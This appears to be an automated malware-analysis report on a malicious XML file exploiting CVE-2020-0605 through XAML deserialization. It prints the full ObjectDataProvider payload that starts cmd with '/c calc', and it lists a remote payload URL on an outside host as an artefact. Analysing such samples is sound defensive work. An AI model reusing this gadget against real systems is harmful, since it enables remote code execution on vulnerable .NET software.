Malicious

xdfa69.xml
XML | MD5: 007bbd422194fd23d021e69590438e63 | Size: 826 B | text/xml

Remote XAML Injection
CVE-2020-0605
XAML Deserialization Exploit
ObjectDataProvider XAML
Characteristics
File Structure
xdfa69.xml (Malicious): Remote XAML Injection, CVE-2020-0605, XAML Deserialization Exploit, ObjectDataProvider XAML
Malware Configuration - XAML RCE Payload
Config. Field | Value
Command | cmd
Arguments | /c calc

Artefacts
Name | Value
Remote XAML Reference | http://tacck.cc/payload.xaml

XAML Embedded ObjectDataProvider:

<ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>
